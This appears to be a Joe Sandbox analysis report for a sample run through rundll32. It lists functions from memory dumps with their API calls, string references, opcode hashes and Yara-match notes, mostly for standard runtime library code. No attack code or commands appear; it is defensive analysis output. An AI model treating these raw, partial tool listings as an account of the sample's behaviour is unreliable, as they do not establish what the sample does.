Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: ffea35c33228980758f2b5958a8a6155229eb6eb3927bbe44d830a3b962ce04b
Instruction ID: 0401c9643bf866dc925a6456e2a93f0aa57c95a88291c6449337e3da72bfef53
Opcode Fuzzy Hash: ffea35c33228980758f2b5958a8a6155229eb6eb3927bbe44d830a3b962ce04b
Instruction Fuzzy Hash: AC21D83E611211EBC7239A628C54A4B7769AB41775F210D24ED16A7288EB30EE10CBD2

Function 6C55BD80 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 191sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 6C55C06E

Strings

(, xrefs: 6C55BE5A
?2, xrefs: 6C55BE6A
8, xrefs: 6C55BEFD
r, xrefs: 6C55BF16
GB, xrefs: 6C55BED5

Memory Dump Source

Source File: 00000004.00000002.4167745334.000000006C531000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000004.00000002.4167717678.000000006C530000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167772525.000000006C56B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167791880.000000006C57A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167864734.000000006C78D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167962728.000000006CA27000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167982575.000000006CA28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c530000_rundll32.jbxd

Similarity

API ID: Sleep
String ID: ($8$?2$GB$r
API String ID: 3472027048-435796455
Opcode ID: e06d5a3a09b6da803c4ef18dc144fb1bb4a9bd029bfaeb2a8e0cf009bca74dba
Instruction ID: 65f1556f01550c45bcacb47d1a1b484ab02bbf4b445b1626017c3a38962ca522
Opcode Fuzzy Hash: e06d5a3a09b6da803c4ef18dc144fb1bb4a9bd029bfaeb2a8e0cf009bca74dba
Instruction Fuzzy Hash: 88917D70E042A8CFDF11CFA9CC846ADBBB1BF4A314F51959AD058A7351D3349A84CF69

Function 7EE604DC Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 7EE60525
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 7EE60590
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7EE605AD
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 7EE605EC
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7EE6064B
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 7EE6066E

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: f1da8f9892b7a06b4096e33df8fe2fa1e61ea107a10018a3148469b287523fdf
Instruction ID: 1c2fcbb2ca1231b177308ae120a604dd1522d83613a7ae01fa8d5fe1e67d10ce
Opcode Fuzzy Hash: f1da8f9892b7a06b4096e33df8fe2fa1e61ea107a10018a3148469b287523fdf
Instruction Fuzzy Hash: 0C51D27A990226AFEB218F65DC44FAF3BB9EF84758F114D29F906D6194D730C810DBA0

Function 7EE63E43 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,7EE63E3A,7EE61A31,7EE607C3), ref: 7EE63E51
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 7EE63E5F
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 7EE63E78
SetLastError.KERNEL32(00000000,?,7EE63E3A,7EE61A31,7EE607C3), ref: 7EE63ECA

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: c01d5595ae89733b9d20aa0ca06d16f22ef1f4a8a8a680ad94e414c8cd40cd16
Instruction ID: d08fc04627f3f7da57781c457a4f542832ed0bacc729de9beb98ac5edc33d1d0
Opcode Fuzzy Hash: c01d5595ae89733b9d20aa0ca06d16f22ef1f4a8a8a680ad94e414c8cd40cd16
Instruction Fuzzy Hash: B001283F2AF3126DD71207FA9C84A0B269CEB455787300F2AF425990D8EF534804C1A2

Function 6C5551C0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 280COMMON

Download Yara Rule

Strings

TMP, xrefs: 6C5555A5
*, xrefs: 6C5551E9
8, xrefs: 6C5552F1

Memory Dump Source

Source File: 00000004.00000002.4167745334.000000006C531000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000004.00000002.4167717678.000000006C530000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167772525.000000006C56B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167791880.000000006C57A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167864734.000000006C78D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167962728.000000006CA27000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.4167982575.000000006CA28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c530000_rundll32.jbxd

Similarity

API ID:
String ID: *$8$TMP
API String ID: 0-2442449778
Opcode ID: e647957b59871c16ad05822e39682087482c7e88834072ffe4a5a695853707e0
Instruction ID: 6e797160d3ce11e23ac4f8dcc3feabba7a187dec7fb24be5bff615ce16023ee7
Opcode Fuzzy Hash: e647957b59871c16ad05822e39682087482c7e88834072ffe4a5a695853707e0
Instruction Fuzzy Hash: ABE1E6B4E05268CFDB16CF69CC54BA9BBF1BB8A304F11959AD448A3350D7349A80CF69

Function 7EE6F245 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7EE6F265
GetFileType.KERNEL32(00000000,?,00003C16), ref: 7EE6F277
swprintf.LIBCMT ref: 7EE6F298
WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7EE6F2D5

Strings

Assertion failed: %Ts, file %Ts, line %d, xrefs: 7EE6F28D

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: ConsoleFileHandleTypeWriteswprintf
String ID: Assertion failed: %Ts, file %Ts, line %d
API String ID: 2943507729-1719349581
Opcode ID: ef8f3bf31ca494596118a22cca31705861624a146c443d44b04b7a2d52e8a71a
Instruction ID: 979814fafbd3430b5bcb2c2c7bb59acf0989747b6ed7fb489246221d984abbc9
Opcode Fuzzy Hash: ef8f3bf31ca494596118a22cca31705861624a146c443d44b04b7a2d52e8a71a
Instruction Fuzzy Hash: 5A11E77E9401186BCB109F29CC84ADF77BCEF44714F504E59E926D7284EB30AD51CB64

Function 7EE707EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,CE2D6D34,7EE852A0,?,00000000,7EE83C13,000000FF,?,7EE7077A,7D83FC4D,?,7EE7074E,7EE852A0), ref: 7EE7081F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 7EE70831
FreeLibrary.KERNEL32(00000000,?,00000000,7EE83C13,000000FF,?,7EE7077A,7D83FC4D,?,7EE7074E,7EE852A0), ref: 7EE70853

Strings

mscoree.dll, xrefs: 7EE70818
CorExitProcess, xrefs: 7EE70829

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 4d92bb7b3e6671c199015fb05f3011487b9827bdd790d4f9f428d902104df012
Instruction ID: 1be5d68ac49415dfc66c6b2b914747149ce1a50c7668ce2919e18d321176f6cd
Opcode Fuzzy Hash: 4d92bb7b3e6671c199015fb05f3011487b9827bdd790d4f9f428d902104df012
Instruction Fuzzy Hash: 6701623A914655AFDB018F51CC05BAEBBBCFB04729F100A35FC17E6780DB759940CA91

Function 7EE15920 Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 7EE15947
int.LIBCPMTD ref: 7EE15960

Part of subcall function 7EE1AA20: std::_Lockit::_Lockit.LIBCPMT ref: 7EE1AA36
Part of subcall function 7EE1AA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7EE1AA60

Concurrency::cancel_current_task.LIBCPMTD ref: 7EE159A7
std::_Lockit::~_Lockit.LIBCPMT ref: 7EE15A3B

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: 6ff329cd88a6645e8f8c689cf0d369f6139c28a13f9d4407d047f79cc7395dda
Instruction ID: 59bea49fc3003206bcb81146431d82f66064dfb74175d59e1c78fa10912419cc
Opcode Fuzzy Hash: 6ff329cd88a6645e8f8c689cf0d369f6139c28a13f9d4407d047f79cc7395dda
Instruction Fuzzy Hash: 9941B9B8D05609DFCB04CF98D990BEEBBB5BF48310F208A59E915A7390D7346A45CBA1

Function 7EE156A0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 7EE156C7
int.LIBCPMTD ref: 7EE156E0

Part of subcall function 7EE1AA20: std::_Lockit::_Lockit.LIBCPMT ref: 7EE1AA36
Part of subcall function 7EE1AA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7EE1AA60

Concurrency::cancel_current_task.LIBCPMTD ref: 7EE15727
std::_Lockit::~_Lockit.LIBCPMT ref: 7EE157BB

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: 8e4ff46b6e9d1dedea47a1ea407693c3f1a66a0b982ad440c7f3f4b316e42883
Instruction ID: 1844798ab2f5125275416f97ec24866f4516dfea123f158671e8ecb57494ab1e
Opcode Fuzzy Hash: 8e4ff46b6e9d1dedea47a1ea407693c3f1a66a0b982ad440c7f3f4b316e42883
Instruction Fuzzy Hash: 7F41D8B8D05609DFCB04CF98D990AEEBBB5BF48310F204A59E815A7390D7346A45CFA1

Function 7EE157E0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 7EE15807
int.LIBCPMTD ref: 7EE15820

Part of subcall function 7EE1AA20: std::_Lockit::_Lockit.LIBCPMT ref: 7EE1AA36
Part of subcall function 7EE1AA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7EE1AA60

Concurrency::cancel_current_task.LIBCPMTD ref: 7EE15867
std::_Lockit::~_Lockit.LIBCPMT ref: 7EE158FB

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: 7d3afe31f54e5605f7ebc0b0f17c19a030c7b0902399857dd9a74733ccbb9e3d
Instruction ID: d68c516eed47d991f1a3db2823411e803eeb5be98d66e76bda9dd30a8118f84e
Opcode Fuzzy Hash: 7d3afe31f54e5605f7ebc0b0f17c19a030c7b0902399857dd9a74733ccbb9e3d
Instruction Fuzzy Hash: B541C7B8D05609DFCB04CF98D990AEEFBB5BF48310F204669E915B7390DB346A45CBA1

Function 7EE5FDA4 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 7EE5FDAB
std::_Lockit::_Lockit.LIBCPMT ref: 7EE5FDB6
std::_Lockit::~_Lockit.LIBCPMT ref: 7EE5FE24

Part of subcall function 7EE5FF07: std::locale::_Locimp::_Locimp.LIBCPMT ref: 7EE5FF1F

std::locale::_Setgloballocale.LIBCPMT ref: 7EE5FDD1
_Yarn.LIBCPMT ref: 7EE5FDE7

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: f2fe168e1e54b2144905990f70390b909da4e50791b3db69528cded534b42280
Instruction ID: dd64c6952f55ac4ad2c7933cf9ebaf8981c818fc5d14d7e3839f6e0f11b09057
Opcode Fuzzy Hash: f2fe168e1e54b2144905990f70390b909da4e50791b3db69528cded534b42280
Instruction Fuzzy Hash: A4018F7EA06510ABC706DF60CC9567D7BB6BF84220F285C48E8069B380DF746E52CBD5

Function 7EE03DB0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 307COMMON

Download Yara Rule

APIs

std::ios_base::clear.LIBCPMTD ref: 7EE0421A

Strings

Y{~, xrefs: 7EE03DDC, 7EE0402E, 7EE04031
k;~, xrefs: 7EE040E5, 7EE040E9
Y{~, xrefs: 7EE04240

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: std::ios_base::clear
String ID: Y{~$Y{~$k;~
API String ID: 1443086396-2835051989
Opcode ID: 6a36654cba1acc48f53d7bd3d4c36a793e2e763446e99fe2cdc05eafefbc86cf
Instruction ID: ca676947c90f63051f74996217b3b92e2530b476398a1458990e636b81205f67
Opcode Fuzzy Hash: 6a36654cba1acc48f53d7bd3d4c36a793e2e763446e99fe2cdc05eafefbc86cf
Instruction Fuzzy Hash: F1F1C578A05259DFDB14CF99C990B9DBBB2FF88314F208699D849AB355C730AE81CF50

Function 7EE347C1 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 201libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(advapi32,00000000,00000008), ref: 7EE34841

Strings

Operation, xrefs: 7EE347CF, 7EE347D6, 7EE347E5
advapi32, xrefs: 7EE3483C
MNo name attribute , xrefs: 7EE34AFC

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: MNo name attribute $advapi32$Operation
API String ID: 1029625771-688042845
Opcode ID: fb7d14c5781da77d283c800457d379fa0e537c5bd6d8572b40c9e952c7181dae
Instruction ID: 45e6a92d538b3fadad677bb1d52b3ab5af50dfaa327e3899d0e4d883a8b2e116
Opcode Fuzzy Hash: fb7d14c5781da77d283c800457d379fa0e537c5bd6d8572b40c9e952c7181dae
Instruction Fuzzy Hash: B591A3B99081A88BDB15CF66CC907FDBBF9BB49304F2088DAD449BB254D3345A80CF59

Function 7EE7742E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 7EE775E7

Strings

9E(j, xrefs: 7EE77458

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: __freea
String ID: 9E(j
API String ID: 240046367-705430000
Opcode ID: bf7e7b70560e12e6e662d755a9290f75144fd59b6031b0d5e056d66a4cb2d427
Instruction ID: 1eb1c6742219a4cf566dfbe26bb59fd29e1931b970660726f3017b4423f976ff
Opcode Fuzzy Hash: bf7e7b70560e12e6e662d755a9290f75144fd59b6031b0d5e056d66a4cb2d427
Instruction Fuzzy Hash: 8251A17A625917AFEF118F60DC80EAF3AB9EF4425AB110D39FD0ADA150EA70CC508760

Function 7EE5F3BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,7EE2E206), ref: 7EE5F3F5
CloseHandle.KERNEL32(7EE2E206), ref: 7EE5F49F
CloseHandle.KERNEL32(?), ref: 7EE5F4A9

Strings

?, xrefs: 7EE5F41B

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: ?
API String ID: 2922976086-1684325040
Opcode ID: aca3590af51b792aab915dbf9f0d090929510e954cce6b1f7401c81e1c9a682e
Instruction ID: 7b552fea0becd7d9f50eb258de1ed83ac44abef5820906eb28e15548ff06f3f7
Opcode Fuzzy Hash: aca3590af51b792aab915dbf9f0d090929510e954cce6b1f7401c81e1c9a682e
Instruction Fuzzy Hash: 9321B175900229BBDF318A95CD04EBF7BBDEFC4700F004C69F905A1290E7318A64CAA0

Function 7EE18290 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 7EE182BD
___std_exception_copy.LIBVCRUNTIME ref: 7EE18307

Strings

>~, xrefs: 7EE182E3, 7EE182EE, 7EE182F9, 7EE1830F, 7EE182FF
>~, xrefs: 7EE182B6, 7EE182D1, 7EE18300, 7EE182BC, 7EE18306

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: >~$>~
API String ID: 2659868963-1161392221
Opcode ID: 6d45555eab37c39aff7fe86c21db756628be701d0f58901389b1b4cd46723459
Instruction ID: 220a5d71a599e28679fd8b79c433197b2e727f993a8a82fd5c6ecc7a677d7ed6
Opcode Fuzzy Hash: 6d45555eab37c39aff7fe86c21db756628be701d0f58901389b1b4cd46723459
Instruction Fuzzy Hash: 5411FAB4A00208EFDB05CF58D98195DBFB1EF49318F2885A9E909AB311D630EE51DF98

Function 7EE64F92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,7EE64F43,00000000,00000001,7F1655E4,?,?,?,7EE650E6,00000004,InitializeCriticalSectionEx,7EE8AE34,InitializeCriticalSectionEx), ref: 7EE64F9F
GetLastError.KERNEL32(?,7EE64F43,00000000,00000001,7F1655E4,?,?,?,7EE650E6,00000004,InitializeCriticalSectionEx,7EE8AE34,InitializeCriticalSectionEx,00000000,?,7EE64E9D), ref: 7EE64FA9
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,7EE63D43), ref: 7EE64FD1

Strings

api-ms-, xrefs: 7EE64FB6

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: a9416ad3f578bc1d2fe13bbc0c4d9e6477b1f7078f32eb19a2210d87deb32b23
Instruction ID: a82ddb484f6ad44ee7ba7a97ccf4321804ee0ff10fba053b4fcfc5ca9955bd60
Opcode Fuzzy Hash: a9416ad3f578bc1d2fe13bbc0c4d9e6477b1f7078f32eb19a2210d87deb32b23
Instruction Fuzzy Hash: 4CE04F39294204F7EB122EA1DC06F093E69BB10B56F209C30F90EE88D0EB61D5619A94

Function 7EE5F930 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlRandomEx,?,7EE5F717,?,?,?,7EE5EF6C,?,0000000F,?,00000000,00000208), ref: 7EE5F946
GetProcAddress.KERNEL32(00000000), ref: 7EE5F94D

Strings

ntdll.dll, xrefs: 7EE5F941
RtlRandomEx, xrefs: 7EE5F93C

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: RtlRandomEx$ntdll.dll
API String ID: 1646373207-4284430886
Opcode ID: a958fdb876eb22cb4489a35ea40167b1b627c72c9cd011b1251181ae05eca4e7
Instruction ID: 9c45223256cc96db436faf275e4c3f66ba6876d615a7216be7155d3c0ac1bb91
Opcode Fuzzy Hash: a958fdb876eb22cb4489a35ea40167b1b627c72c9cd011b1251181ae05eca4e7
Instruction Fuzzy Hash: 6ED0C73E510244EB9B005FE6CC58A553F6DAF045157141D21FD0DD9305DB36E598DA90

Function 7EE7B783 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(CE2D6D34), ref: 7EE7B7E6

Part of subcall function 7EE7772F: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000001,0000FDE9,00000000,?,?,?,7EE75A54,?,00000000,?), ref: 7EE777DB

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 7EE7BA41
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 7EE7BA89
GetLastError.KERNEL32 ref: 7EE7BB2C

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 513a98058d4da58ddf25a87558f0de9e8c34f4a7e8c63a1d06a2757599791c2d
Instruction ID: dae51d9312ed7469cc3eef57e3c6d6bc459792e1f4672e234e354c91bc8be15c
Opcode Fuzzy Hash: 513a98058d4da58ddf25a87558f0de9e8c34f4a7e8c63a1d06a2757599791c2d
Instruction Fuzzy Hash: A3D17FB9D042589FDF05CFA9C890ADDBBB5FF18314F14492AE896E7345E730A942CB50

Function 7EE77A81 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 7EE7772F: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000001,0000FDE9,00000000,?,?,?,7EE75A54,?,00000000,?), ref: 7EE777DB

GetLastError.KERNEL32 ref: 7EE77AE5
__dosmaperr.LIBCMT ref: 7EE77AEC
GetLastError.KERNEL32(?,?,?,?), ref: 7EE77B26
__dosmaperr.LIBCMT ref: 7EE77B2D

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 4c4cb0acab950dcc11f00ff91a2246cda6358d9cbe01ad20bc950073c1a799ab
Instruction ID: 091884e307a925b6cc5d6b15169188de5fbb43f95ea68b5a80575ef06a3e128e
Opcode Fuzzy Hash: 4c4cb0acab950dcc11f00ff91a2246cda6358d9cbe01ad20bc950073c1a799ab
Instruction Fuzzy Hash: 6021D739614206BFD7119F62C88095BBBBEFF012697148D38F85997144E770ED41C7A0

Function 7EE6FEC3 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e7c78139c3778223040f2bfb4685e7b7604de6101f9f75ef12b64e8ef67d163
Instruction ID: 5fbead75496e7acf555924d26ddb01834a6110efa1f339c39d00556ad24bf9b6
Opcode Fuzzy Hash: 7e7c78139c3778223040f2bfb4685e7b7604de6101f9f75ef12b64e8ef67d163
Instruction Fuzzy Hash: 0C21C339699206BFC7119F62CC9090BB7BEAF062787104E24F825C7148DB71EC21C760

Function 7EE7898F Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,7EE70BC9), ref: 7EE78997

Part of subcall function 7EE7772F: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000001,0000FDE9,00000000,?,?,?,7EE75A54,?,00000000,?), ref: 7EE777DB

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 7EE789CF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 7EE789EF

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 3236050e0cbfda0d1b037408ebd59d9e735747bba9e0915d94801411651c0c11
Instruction ID: 37fce74223f4d2c04e40f205aea05d4bc632b5971d5a8977cd6b484fd3d7f6e7
Opcode Fuzzy Hash: 3236050e0cbfda0d1b037408ebd59d9e735747bba9e0915d94801411651c0c11
Instruction Fuzzy Hash: 0B1104BE52A52A7FA31657B64CCCCAF3A6CDF981A97100C35F802D5200FB20DD4182B5

Function 7EE7F779 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000,?,?,7EE7F089,?,00000001,?,?,?,7EE7BB80), ref: 7EE7F790
GetLastError.KERNEL32(?,7EE7F089,?,00000001,?,?,?,7EE7BB80), ref: 7EE7F79C

Part of subcall function 7EE7F762: CloseHandle.KERNEL32(FFFFFFFE,7EE7F7AC,?,7EE7F089,?,00000001,?,?,?,7EE7BB80), ref: 7EE7F772

___initconout.LIBCMT ref: 7EE7F7AC

Part of subcall function 7EE7F724: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,7EE7F753,7EE7F076,?,?,7EE7BB80), ref: 7EE7F737

WriteConsoleW.KERNEL32(?,?,?,00000000,?,7EE7F089,?,00000001,?,?,?,7EE7BB80), ref: 7EE7F7C1

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

